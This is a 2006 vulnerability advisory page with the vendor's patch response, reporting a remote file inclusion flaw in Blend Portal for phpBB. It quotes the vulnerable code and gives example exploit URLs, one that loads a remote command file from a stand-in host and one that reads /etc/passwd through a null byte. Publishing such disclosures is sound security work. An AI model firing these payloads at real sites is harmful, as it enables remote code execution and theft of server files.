Blend Portal <= 1.2.0 for phpBB 2.x(blend_data/blend_common.php) File Inclusion Vulnerability

2006.06.01
Risk: High
Local: No
Remote: Yes
CWE: N/A

I have addressed this issue & the one reported about the Activity Mod Plus. Below is a link to patches for both. Thanks. http://phpbb-tweaks.com/topics.html-p-17623#17623 Thanks For Your E-Mail aUsTiN & Staff For an interactinve phpBB Support board http://phpbb-tweaks.com/ For a phpBB based portal & support http://phpbb-portal.com/ For a phpBB based gaming system & support http://phpbb-amod.com/ http://aUsTiN-Inc.net/ >From: Mustafa Can Bjorn IPEKCI <nukedx (at) nukedx (dot) com [email concealed]> >To: submit (at) milw0rm (dot) com [email concealed], >full-disclosure (at) lists.grok.org (dot) uk [email concealed],bugtraq (at) securityfocus (dot) com [email concealed], >austin_inc (at) hotmail (dot) com [email concealed] >Subject: Advisory: Blend Portal <= 1.2.0 for phpBB >2.x(blend_data/blend_common.php) File Inclusion Vulnerability >Date: Sun, 28 May 2006 20:46:39 +0300 >MIME-Version: 1.0 >Received: from king.anope.net ([67.15.88.53]) by >bay0-mc10-f9.bay0.hotmail.com with Microsoft SMTPSVC(6.0.3790.1830); Sun, >28 May 2006 10:54:44 -0700 >Received: (qmail 1602 invoked from network); 28 May 2006 20:46:45 +0300 >Received: from localhost (@127.0.0.1) by localhost with SMTP; 28 May 2006 >20:46:44 +0300 >Received: from 85.103.237.117 ([85.103.237.117]) by >webmail.nukedx.com(Horde MIME library) with HTTP; Sun, 28 May 2006 20:46:39 >+0300 >X-Message-Info: LsUYwwHHNt3IkD50dWx1Zh4q3nci+v36uLgoVBpjm50= >User-Agent: Internet Messaging Program (IMP) H3 (4.1) >Return-Path: nukedx (at) nukedx (dot) com [email concealed] >X-OriginalArrivalTime: 28 May 2006 17:54:44.0992 (UTC) >FILETIME=[CDAF6800:01C6827F] > >--Security Report-- >Advisory: Blend Portal <= 1.2.0 for phpBB 2.x >(blend_data/blend_common.php) File Inclusion Vulnerability. >--- >Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI >--- >Date: 28/05/06 07:52 PM >--- >Contacts:{ >ICQ: 10072 >MSN/Email: nukedx (at) nukedx (dot) com [email concealed] >Web: http://www.nukedx.com >} >--- >Vendor: phpbb-portal (http://www.phpbb-portal.com/) >Version: 1.2.0 and prior versions must be affected. >About: Via this methods remote attacker can include arbitrary >internal/external files to phpBB. phpbb_root_path >variable in /blend_data/blend_common.php did not sanitized properly before >using it.You can find vulnerable code in >blend_common.php at lines 74-77 >-Source in blend_common.php- >74: else >75: { >76: include_once($phpbb_root_path . BLEND_DATA_PATH . BLEND_CACHE_PATH >.'config.'. $phpEx); >77: } >-End of source- >Level: Highly Critical >--- >How&Example: >Succesful exploitation needs register_globals on & allow url_fopen on >GET -> >http://[victim]/[phpBB]/blend_data/blend_common.php?phpbb_root_path=[FI LE] >EXAMPLE -> >http://[victim]/[phpBB]/blend_data/blend_common.php?phpbb_root_path=htt p://yoursite.com/cmd.txt? >EXAMPLE -> >http://[victim]/[phpBB]/blend_data/blend_common.php?phpbb_root_path=/et c/passwd%00 >--- >Timeline: >* 28/05/2006: Vulnerability found. >* 28/05/2006: Contacted with vendor and waiting reply. >--- >Exploit: http://www.nukedx.com/?getxpl=41 >--- >Original advisory can be found at: http://www.nukedx.com/?viewdoc=41 > _________________________________________________________________ Don?t just search. Find. Check out the new MSN Search! http://search.msn.click-url.com/go/onm00200636ave/direct/01/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top